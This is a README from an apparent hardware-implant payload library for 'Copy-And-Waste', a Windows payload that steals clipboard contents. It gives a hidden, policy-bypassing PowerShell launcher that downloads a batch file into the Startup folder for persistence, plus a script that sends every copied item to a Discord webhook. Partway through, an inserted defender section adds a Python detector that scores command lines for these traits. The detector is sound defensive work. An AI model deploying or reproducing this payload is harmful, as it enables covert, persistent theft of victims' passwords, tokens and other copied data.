omg-payloads/payloads/library/exfiltration/Copy-And-Waste/README.md

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

Copy-And-Waste

A payload to exfiltrate clipboard contents

Description

This payload uses iwr (Invoke-WebRequest) to download 2 files:

  • I.bat
  • c.ps1

I.bat is downloaded to the startup folder to maintain persistence and execute c.ps1 on reboot/startup.

c.ps1 will sit in the AppData\Roaming folder, waiting for a Ctrl + C or Ctrl + X key press.

The contents will then be sent to the Discord webhook for viewing pleasure.

To kill the script, press both Ctrl keys at the same time [it will resume at reboot].

Getting Started

Dependencies

  • Pastebin or other file sharing service, Discord webhook or other webhook service
  • Windows 10, 11
  • Here is a tutorial on how to use Discord webhooks

Executing program

  • Plug in your device
  • Device will download both files and place them in proper directories to then run the script
powershell -w h -NoP -NonI -Ep Bypass "echo (iwr PASTEBIN LINK FOR BAT).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr PASTEBIN LINK FOR PS1).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""
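
For defenders, the launcher above leaves a recognisable process command line. The following is an added example, not part of the original payload or written by its authors: a Python check that scores command lines from process-creation logs (such as Sysmon Event ID 1 or Security Event 4688 with command-line logging enabled) against the traits described on this page. The indicator names, the threshold of 3 and the sample lines are assumptions constructed for illustration.

```python
import re

# Traits of the launcher command shown above. Each is weak on its own
# (admins use them too), so an alert needs several in one command line.
INDICATORS = {
    "hidden_window": r"(?<![\w-])-w(?:i\w*)?\s+h(?:id\w*)?\b",  # -w h / -WindowStyle Hidden
    "policy_bypass": r"(?<![\w-])-e[px]\w*\s+bypass\b",         # -Ep / -ExecutionPolicy Bypass
    "web_download": r"\b(?:iwr|invoke-webrequest)\b",
    # A script file written into the per-user Startup folder (persistence).
    "startup_write": r"\\Start Menu\\Programs\\Startup\\[^;>]+?\.(?:bat|cmd|ps1|vbs)\b",
    # A .ps1 placed directly in the root of AppData\Roaming.
    "appdata_script": r"(?:\$env:APPDATA|\\AppData\\Roaming)\\[^\\\s;>]+\.ps1\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in INDICATORS.items()}
IS_POWERSHELL = re.compile(r"\b(?:powershell|pwsh)(?:\.exe)?\b", re.IGNORECASE)


def indicators(command_line):
    """Return the sorted indicator names found in one process command line."""
    return sorted(n for n, rx in COMPILED.items() if rx.search(command_line))


def is_suspicious(command_line, threshold=3):
    """Alert when a PowerShell command line combines >= threshold indicators."""
    if not IS_POWERSHELL.search(command_line):
        return False
    return len(indicators(command_line)) >= threshold


# Constructed process-creation command lines (not real telemetry). The first
# mirrors the launcher's shape with placeholder URLs; the others are benign.
SAMPLES = [
    r'powershell -w h -NoP -NonI -Ep Bypass "echo (iwr https://example.invalid/a).content > "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\l.bat";echo (iwr https://example.invalid/b).content > "$env:APPDATA\c.ps1";powershell "$env:APPDATA\c.ps1""',
    r'powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Program Files\Vendor\update.ps1"',
    r'powershell -Command "iwr https://example.invalid/health"',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(is_suspicious(line), indicators(line))
```

The relaunch at logon only matches `appdata_script`, so pair this with file-creation monitoring on the Startup folder rather than relying on the command line alone.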

Contributing

All contributors' names will be listed here:

atomiczsec & I-Am-Jakoby

Version History

  • 0.1
    • Initial Release

Contact

📱 My Socials 📱

YouTube
Twitter
I-Am-Jakoby's Discord

Acknowledgments
